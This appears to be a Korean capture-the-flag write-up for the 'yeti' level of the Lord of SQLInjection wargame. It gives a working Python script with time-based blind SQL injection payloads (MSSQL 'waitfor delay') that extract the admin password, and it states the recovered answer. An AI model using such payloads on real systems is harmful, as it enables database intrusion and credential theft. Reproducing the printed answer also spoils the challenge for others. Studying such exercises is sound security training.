# yeti 첫 화면이다. ![](/files/-M-nWGi6-D3BjQ_5lbxD) Blind SQLi 문제로 인식을 했고, 출력으로 확인할 방법이 없으니 Time-based Blind SQLi로 풀기로 하였다. waitfor delay를 사용한다. 파이썬 코드를 짜면 아래와 같다. ```python import requests import time URL = 'https://los.rubiya.kr/chall/yeti_e6afc70b892148ced2d1e063c1230255.php?pw=' PHPSESSID = 'MY_PHPSESSID' SLEEP = 2 def query(payload): start = time.time() cookies = {'PHPSESSID': PHPSESSID} requests.post(URL + payload, cookies=cookies) if time.time() - start > SLEEP: return True else: return False # 8 def find_pw_length(): pw_len = 1 while query("' if(len((select pw from prob_yeti where id='admin'))={}) waitfor delay '00:00:0{}'--".format(pw_len, SLEEP)) is False: pw_len += 1 print('pw_len: {}'.format(pw_len)) return pw_len # 6425b725 def find_pw(): pw_len = find_pw_length() pw = '' for pos in range(1, pw_len + 1): for character in range(0, 128): if query("' if(unicode(substring((select pw from prob_yeti where id='admin'),{},1))={}) waitfor delay '00:00:0{}'--".format(pos, character, SLEEP)) is True: pw += chr(character) break print('pw: {}'.format(pw)) find_pw() ``` 실행결과, pw는 `6425b725` 이다. 에 접속하면 문제가 풀린다. ![](/files/-M-nbg9NaTy4S_TnNraK) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://donghyunlee.gitbook.io/write-up/wargame/lord-of-sqlinjection/yeti.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.